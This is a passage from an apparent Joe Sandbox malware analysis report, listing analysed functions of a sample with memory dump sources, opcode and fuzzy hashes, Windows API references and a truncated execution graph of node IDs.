                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_14f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: b7d6a3271f7909b0f38d01da4a392eb41ea6eec5551b7058717a920f6ac53eb1
                                                                                                • Instruction ID: f621eea30031a3161e4e0ad9c19e50852bc71902ba9bceda82f8fc2874f684f7
                                                                                                • Opcode Fuzzy Hash: b7d6a3271f7909b0f38d01da4a392eb41ea6eec5551b7058717a920f6ac53eb1
                                                                                                • Instruction Fuzzy Hash: A11113B9D003198FDB10CF9AC844ADEFBF4AB88324F20851AD519A7310C379A545CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07B78F60 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 07B78FBD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.301786156.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7b70000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost
                                                                                                • String ID:
                                                                                                • API String ID: 410705778-0
                                                                                                • Opcode ID: 7b8c9c19abc01766ec39932b856e2d24286e72fad561dee9c65cdd160f5ad768
                                                                                                • Instruction ID: 46272fa57a38d89f181ecffc7a26ba0660425aef50800163972b2dab76fef4fc
                                                                                                • Opcode Fuzzy Hash: 7b8c9c19abc01766ec39932b856e2d24286e72fad561dee9c65cdd160f5ad768
                                                                                                • Instruction Fuzzy Hash: 221103B58003499FDB10CF9AD884BDEBBF8EB58324F20885AE554A7200C375A984CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0133D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275091784.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_133d000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 984b0785cba3f2309d8ff0e2b73f148d97637bdf3af2b0c0666b6975993c0be8
                                                                                                • Instruction ID: db758d144ab64f818dc3f4637792ff8095eeafbec148d3b22a20bb59464e4249
                                                                                                • Opcode Fuzzy Hash: 984b0785cba3f2309d8ff0e2b73f148d97637bdf3af2b0c0666b6975993c0be8
                                                                                                • Instruction Fuzzy Hash: C3212876500244DFEB16DF58D9C0B26BF65FBC831CF64C569E8050B646C336D455CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0134D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275129607.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_134d000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 91a55f7890a9aacbb5fec93436717b400d42ae176751a553d9942f7a255b22a6
                                                                                                • Instruction ID: f90401c9bff409cc28dcb509157044927a0e301f69a5679b7a09765c519bb3c7
                                                                                                • Opcode Fuzzy Hash: 91a55f7890a9aacbb5fec93436717b400d42ae176751a553d9942f7a255b22a6
                                                                                                • Instruction Fuzzy Hash: A8212975604244DFDB06CF58D9C0B16BBE5FB94328F24C66DE8494B356C33AE846CB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0134D01C Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275129607.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_134d000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7ed5b2f3f4505192fc9cd5c8030952a1ef47d3bd5b86901087ac24a07e2e4d40
                                                                                                • Instruction ID: 9847efd0b9db95e24ba93eb1a334f59b95b1f3d842a73574c9a9dc70ab12dc61
                                                                                                • Opcode Fuzzy Hash: 7ed5b2f3f4505192fc9cd5c8030952a1ef47d3bd5b86901087ac24a07e2e4d40
                                                                                                • Instruction Fuzzy Hash: 84212275604244DFDB15CF68D9C0B16BBA5FB98358F24C96DD80A4B246C33BE846CA61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0134D006 Relevance: .1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275129607.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_134d000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 38873817b1629c0888a1592bd5123aa64e3111f346adab89a40cb836c73ec2e6
                                                                                                • Instruction ID: 24f21a3145e90d2ae6d92159883de0deb59bb294a25dec3012d995e10b86309b
                                                                                                • Opcode Fuzzy Hash: 38873817b1629c0888a1592bd5123aa64e3111f346adab89a40cb836c73ec2e6
                                                                                                • Instruction Fuzzy Hash: D32150755083809FDB03CF54D994B15BFB1EB46214F28C5DAD8458F297C33AD856CB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0133D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275091784.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_133d000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                                • Instruction ID: 8d9fc61f047116d074854a85b2554add7d09cc5ee0036ce2c23c0456d406aa70
                                                                                                • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                                • Instruction Fuzzy Hash: DE11D376504280CFDB12CF54D9C4B16BF71FBC4328F28C6A9D8450B656C33AD456CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0134D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275129607.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_134d000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
                                                                                                • Instruction ID: bbbacb1f3142b59c2b9c4306c4001f64bbf89a2be1e7f0362ad9b4ce9e6ea636
                                                                                                • Opcode Fuzzy Hash: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
                                                                                                • Instruction Fuzzy Hash: 69118B76504280DFDB12CF58D9C4B15BBB1FB84228F28C6ADD8494B656C33AE44ACB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0133D745 Relevance: .0, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275091784.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_133d000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 204b9e0cfc2635626498e773358335ee2168a772a97f45af1175bfd518ee84ca
                                                                                                • Instruction ID: 77e3b1a24959a61de46ecbfeac21ca41f4238c3f1597c5062a1f650a6b4aca79
                                                                                                • Opcode Fuzzy Hash: 204b9e0cfc2635626498e773358335ee2168a772a97f45af1175bfd518ee84ca
                                                                                                • Instruction Fuzzy Hash: 310147310043C49AE7228E6ECC84B67BF9CEF81268F48C51AED040A282D2399840CAB5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0133D744 Relevance: .0, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275091784.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_133d000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 54d6aadfee12599a4e29fd9eb5dd0ccfbe3fbbf26c465a93868537092d631b08
                                                                                                • Instruction ID: 80d6b7e416e3312a6d631f89a8cf00c240380c410168c4878ec76e518a654c99
                                                                                                • Opcode Fuzzy Hash: 54d6aadfee12599a4e29fd9eb5dd0ccfbe3fbbf26c465a93868537092d631b08
                                                                                                • Instruction Fuzzy Hash: FBF0C2714043849AE7118E1ACC84B62FF98EB81278F18C55AED485B386C3799844CAB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 073F3B45 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.300061969.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_73f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: UUUU
                                                                                                • API String ID: 0-1798160573
                                                                                                • Opcode ID: b0e44fb095d0d4b0d5b28940a339f13f7c71093cec316bcc308b6734a91845fc
                                                                                                • Instruction ID: a840a3fa7c98cc5182250e499fb27abed6d90e68e372bb01991f9ece14d56002
                                                                                                • Opcode Fuzzy Hash: b0e44fb095d0d4b0d5b28940a339f13f7c71093cec316bcc308b6734a91845fc
                                                                                                • Instruction Fuzzy Hash: D1515B70E106288FEB64CF6DC885B8DBBF2BB48354F5486A9D46DE7206D7349A85CF10
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014FF1F8 Relevance: .3, Instructions: 315COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275313052.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_14f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3ef0c4e688ec22f9d7735fa0fcfb7159ee287cf8eb66ad0338bc0a1d545cf5f5
                                                                                                • Instruction ID: 18f99c85a6fff55bc2c82e5ff83681ebb94e9d72b88acae48adabbddb4d3df84
                                                                                                • Opcode Fuzzy Hash: 3ef0c4e688ec22f9d7735fa0fcfb7159ee287cf8eb66ad0338bc0a1d545cf5f5
                                                                                                • Instruction Fuzzy Hash: 0F12C3F18997478AD714CF66F9882897B61B741328BF04B08D261BBBD0D7B4396ACF44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014FC844 Relevance: .3, Instructions: 265COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275313052.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_14f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 14861e02074b3ff1818766a20bce683d7e7aa32142290bc3b74843c815627a61
                                                                                                • Instruction ID: 8cfe35b2ad06476a008d82797926d4263198918b870501876b124324dae3ac4c
                                                                                                • Opcode Fuzzy Hash: 14861e02074b3ff1818766a20bce683d7e7aa32142290bc3b74843c815627a61
                                                                                                • Instruction Fuzzy Hash: 8DA14E36E0061A8FCF05DFA5C88459EBBB2FF95301B15856EEA05BB371DB31A915CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014FF1E8 Relevance: .2, Instructions: 223COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275313052.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_14f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b2238f2ff7cff5d373d9e22302abc673ce761b5954d6e5c37c618e7ef9e4eb5b
                                                                                                • Instruction ID: ded718dfa022731e60630663673a5dce722a6394d0945658112eadf131ddae55
                                                                                                • Opcode Fuzzy Hash: b2238f2ff7cff5d373d9e22302abc673ce761b5954d6e5c37c618e7ef9e4eb5b
                                                                                                • Instruction Fuzzy Hash: 39C125B1C957078AD714CF66F9882897BA1BB85324FB04B08D121BB7D0DBB4396ACF44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 073F00B1 Relevance: .2, Instructions: 164COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.300061969.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_73f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 020a23f7a8b09fb5f722e98c134b8baa7c361b4393bf727e2b108805edb060a7
                                                                                                • Instruction ID: c044b54b710cfff8202a2adba5fa0620d56584841dc0a43ca7debd707bcf93d9
                                                                                                • Opcode Fuzzy Hash: 020a23f7a8b09fb5f722e98c134b8baa7c361b4393bf727e2b108805edb060a7
                                                                                                • Instruction Fuzzy Hash: 95615E71A102498BD748EFAEE88169EBFF3BBD8304F14C52AD015AB3A4DB755909DB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 073F00C0 Relevance: .2, Instructions: 160COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.300061969.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_73f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 94f5946460ddaafadc4ec225386add60e93cf9fc0e3752ec954183df8920c6a2
                                                                                                • Instruction ID: f41d822d3a9b054667e271b96d42cf96df5b52697e0a7d33fa11354e11532e3f
                                                                                                • Opcode Fuzzy Hash: 94f5946460ddaafadc4ec225386add60e93cf9fc0e3752ec954183df8920c6a2
                                                                                                • Instruction Fuzzy Hash: E6612E71A102498BD748EFAEE88169ABFF3BBD8304F14C42AD015AB364DF755909DB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014FA720 Relevance: .1, Instructions: 137COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275313052.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_14f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4ff333b050eece4677af0e98d82ace63a380746a35a5a2692840393e0844d9fb
                                                                                                • Instruction ID: b07d04af8d76dd2bd5457b6e0d862c0adf30a133c8254e9254b6dae753cc4afd
                                                                                                • Opcode Fuzzy Hash: 4ff333b050eece4677af0e98d82ace63a380746a35a5a2692840393e0844d9fb
                                                                                                • Instruction Fuzzy Hash: FF41972944C3D85EC72ADF3948952E67FB2FB42658BAD04DFE6CA89466C2114893C7C4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 073F9DE8 Relevance: .1, Instructions: 112COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.300061969.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_73f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 98cc6449830f219f5ab79c4cc747d6c87b0b466d9745b48f241bb58493d257c1
                                                                                                • Instruction ID: 6ba540ed0ae902979ae0532b02230d550c5b1c518b363da78cef30c3f94aa8e8
                                                                                                • Opcode Fuzzy Hash: 98cc6449830f219f5ab79c4cc747d6c87b0b466d9745b48f241bb58493d257c1
                                                                                                • Instruction Fuzzy Hash: EA4115B4E19209CBDB08CFA9D4807EEBBF6BB89340F20942AD509E7214DB3469418F50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 073F0360 Relevance: .1, Instructions: 110COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.300061969.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_73f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5b63d1ee8d4135b3ed0d51ada74fac5c853b6dd89a5e222376d82dd389e4ae57
                                                                                                • Instruction ID: 9f52884f576b60cce4c11a6f38051396b9a0f67f2349fc9ddf9b6002ffd3686c
                                                                                                • Opcode Fuzzy Hash: 5b63d1ee8d4135b3ed0d51ada74fac5c853b6dd89a5e222376d82dd389e4ae57
                                                                                                • Instruction Fuzzy Hash: CD512DB1E116188BEB58CF6BCD4069EFAF7AFC9300F14C1BA980DA7255DB311A918F54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014FA780 Relevance: .1, Instructions: 108COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275313052.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_14f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 358ec3a7217a3fc6149dd15321bc84272f66c1be190563d99d0301d26c1eaaf6
                                                                                                • Instruction ID: f504024015f94cf7792221da2db57db238fe9ec1e883eb70ab98398f7ceaceb8
                                                                                                • Opcode Fuzzy Hash: 358ec3a7217a3fc6149dd15321bc84272f66c1be190563d99d0301d26c1eaaf6
                                                                                                • Instruction Fuzzy Hash: 4641972844C3D45EC72B9F3948992E5BFB2FB467687ED049FE6CA89426C21148D3C7D4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07B70040 Relevance: .1, Instructions: 100COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.301786156.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7b70000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 93a4d3b5fb83c38b764d8373d892a32209d2f8a9ba7d4c48f56499c303ad42cc
                                                                                                • Instruction ID: 8b2c1b5bc875cdaad8a1ad256cff6adac0a1f2f3371f7aabaa38cbf930aba323
                                                                                                • Opcode Fuzzy Hash: 93a4d3b5fb83c38b764d8373d892a32209d2f8a9ba7d4c48f56499c303ad42cc
                                                                                                • Instruction Fuzzy Hash: 77412FB1E05A588BEB5CCF6B8C4079AFAF7BFC9201F14C1FAC40CAA254EB3045858E51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 073F0350 Relevance: .1, Instructions: 94COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.300061969.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_73f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6b599efb2ba89443a51a86385320ee083b50d2ebe7521c014837a439401f80ad
                                                                                                • Instruction ID: 11a0f6d3515d640a391020da7e1eb3731e10232f3c09a307005d4e43cf6a7c95
                                                                                                • Opcode Fuzzy Hash: 6b599efb2ba89443a51a86385320ee083b50d2ebe7521c014837a439401f80ad
                                                                                                • Instruction Fuzzy Hash: F24125B1E116188BEB1CCF6B9D4169DFAF7AFC8310F18C1BA940CAB255DB3105568F54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07B7003A Relevance: .1, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.301786156.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7b70000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 85b5e20bf136ecfdb94d4be6605eca9afacd76180a8d978f52204cd41fab75e4
                                                                                                • Instruction ID: 700e02531472b762205c5e2d1d0485cb37f2be207afe41a289372adefc53d08f
                                                                                                • Opcode Fuzzy Hash: 85b5e20bf136ecfdb94d4be6605eca9afacd76180a8d978f52204cd41fab75e4
                                                                                                • Instruction Fuzzy Hash: 4941F4B1E05A548BFB5CDF6B9D4069AFAF3BFC9201F14C1BAD40DAA254EB3405868F05
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:16.1%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:1.1%
                                                                                                Total number of Nodes:357
                                                                                                Total number of Limit Nodes:40
                                                                                                execution_graph 26244 e90448 26245 e9044d 26244->26245 26246 e9048f 26245->26246 26253 6422940 26245->26253 26257 6422950 26245->26257 26261 e90e18 26245->26261 26265 e90b58 26245->26265 26269 e90b48 26245->26269 26273 e90e17 26245->26273 26254 6422950 26253->26254 26277 642202c 26254->26277 26258 6422952 26257->26258 26259 642202c 5 API calls 26258->26259 26260 6422980 26259->26260 26260->26245 26263 e90e1e 26261->26263 26262 e90f9e 26262->26245 26263->26262 26419 e90fa8 26263->26419 26267 e90b5a 26265->26267 26266 e90df6 26266->26245 26267->26266 26268 e90fa8 2 API calls 26267->26268 26268->26267 26271 e90b4c 26269->26271 26270 e90df6 26270->26245 26271->26270 26272 e90fa8 2 API calls 26271->26272 26272->26271 26275 e90e1e 26273->26275 26274 e90f9e 26274->26245 26275->26274 26276 e90fa8 2 API calls 26275->26276 26276->26275 26278 6422037 26277->26278 26281 64237cc 26278->26281 26282 64237d7 26281->26282 26283 64249ee 26282->26283 26286 6426f28 26282->26286 26292 6426f19 26282->26292 26288 6426f49 26286->26288 26287 6426f6d 26287->26283 26288->26287 26298 6427095 26288->26298 26302 64270d8 26288->26302 26306 64270c8 26288->26306 26293 6426f28 26292->26293 26294 6426f6d 26293->26294 26295 6427095 5 API calls 26293->26295 26296 64270c8 5 API calls 26293->26296 26297 64270d8 5 API calls 26293->26297 26294->26283 26295->26294 26296->26294 26297->26294 26299 64270a6 26298->26299 26301 64270ab 26299->26301 26310 64250e0 26299->26310 26301->26287 26303 64270e5 26302->26303 26304 64250e0 5 API calls 26303->26304 26305 642711e 26303->26305 26304->26305 26305->26287 26308 64270e5 26306->26308 26307 64250e0 5 API calls 26309 642711e 26307->26309 26308->26307 26308->26309 26309->26287 26311 64250eb 26310->26311 26313 6427190 26311->26313 26314 6425114 26311->26314 26313->26313 26315 642511f 26314->26315 26321 6425124 26315->26321 26317 64271ff 26325 642ceb0 26317->26325 26334 642cec8 26317->26334 26318 6427238 26318->26313 26322 642512f 26321->26322 26323 6427934 26322->26323 26324 6426f28 5 API calls 26322->26324 26323->26317 26324->26323 26327 642cef9 26325->26327 26328 642cfea 26325->26328 26326 642cf05 26326->26318 26327->26326 26343 642d120 26327->26343 26347 642d130 26327->26347 26328->26318 26329 642cf45 26351 642f4c0 26329->26351 26362 642f4d0 26329->26362 26336 642cef9 26334->26336 26338 642cfea 26334->26338 26335 642cf05 26335->26318 26336->26335 26341 642d120 4 API calls 26336->26341 26342 642d130 4 API calls 26336->26342 26337 642cf45 26339 642f4c0 2 API calls 26337->26339 26340 642f4d0 2 API calls 26337->26340 26338->26318 26339->26338 26340->26338 26341->26337 26342->26337 26373 642d170 26343->26373 26388 642d1c8 26343->26388 26344 642d13a 26344->26329 26348 642d13a 26347->26348 26349 642d170 3 API calls 26347->26349 26350 642d1c8 3 API calls 26347->26350 26348->26329 26349->26348 26350->26348 26352 642f4ca 26351->26352 26401 642c79c 26352->26401 26355 642f578 26358 642f5a1 26355->26358 26412 642c644 26355->26412 26360 642c79c GetModuleHandleW 26360->26355 26363 642f4fa 26362->26363 26364 642c79c GetModuleHandleW 26363->26364 26365 642f55c 26364->26365 26370 642f9f0 GetModuleHandleW 26365->26370 26371 642c79c GetModuleHandleW 26365->26371 26366 642f578 26367 642c644 GetModuleHandleW 26366->26367 26369 642f5a1 26366->26369 26368 642f5cb 26367->26368 26372 68d3320 CreateWindowExW 26368->26372 26370->26366 26371->26366 26372->26369 26374 642d1b8 26373->26374 26377 642d17a 26373->26377 26375 642c644 GetModuleHandleW 26374->26375 26376 642d1db 26375->26376 26378 642d1f3 26376->26378 26382 642e220 GetModuleHandleW LoadLibraryExW 26376->26382 26383 642ddd0 GetModuleHandleW LoadLibraryExW 26376->26383 26384 642dff1 GetModuleHandleW LoadLibraryExW 26376->26384 26385 642dca5 GetModuleHandleW LoadLibraryExW 26376->26385 26386 642e038 GetModuleHandleW LoadLibraryExW 26376->26386 26387 642dcb8 GetModuleHandleW LoadLibraryExW 26376->26387 26377->26344 26378->26344 26379 642d1eb 26379->26378 26380 642d3f0 GetModuleHandleW 26379->26380 26381 642d41d 26380->26381 26381->26344 26382->26379 26383->26379 26384->26379 26385->26379 26386->26379 26387->26379 26389 642d1db 26388->26389 26390 642c644 GetModuleHandleW 26388->26390 26391 642d1f3 26389->26391 26395 642e220 GetModuleHandleW LoadLibraryExW 26389->26395 26396 642ddd0 GetModuleHandleW LoadLibraryExW 26389->26396 26397 642dff1 GetModuleHandleW LoadLibraryExW 26389->26397 26398 642dca5 GetModuleHandleW LoadLibraryExW 26389->26398 26399 642e038 GetModuleHandleW LoadLibraryExW 26389->26399 26400 642dcb8 GetModuleHandleW LoadLibraryExW 26389->26400 26390->26389 26391->26344 26392 642d1eb 26392->26391 26393 642d3f0 GetModuleHandleW 26392->26393 26394 642d41d 26393->26394 26394->26344 26395->26392 26396->26392 26397->26392 26398->26392 26399->26392 26400->26392 26402 642c7a7 26401->26402 26403 642f55c 26402->26403 26404 642fcc6 GetModuleHandleW 26402->26404 26405 642fc5d GetModuleHandleW 26402->26405 26403->26360 26406 642f9f0 26403->26406 26404->26403 26405->26403 26407 642fa0b 26406->26407 26408 642fa0f 26406->26408 26407->26355 26409 642fb4e 26408->26409 26410 642fcc6 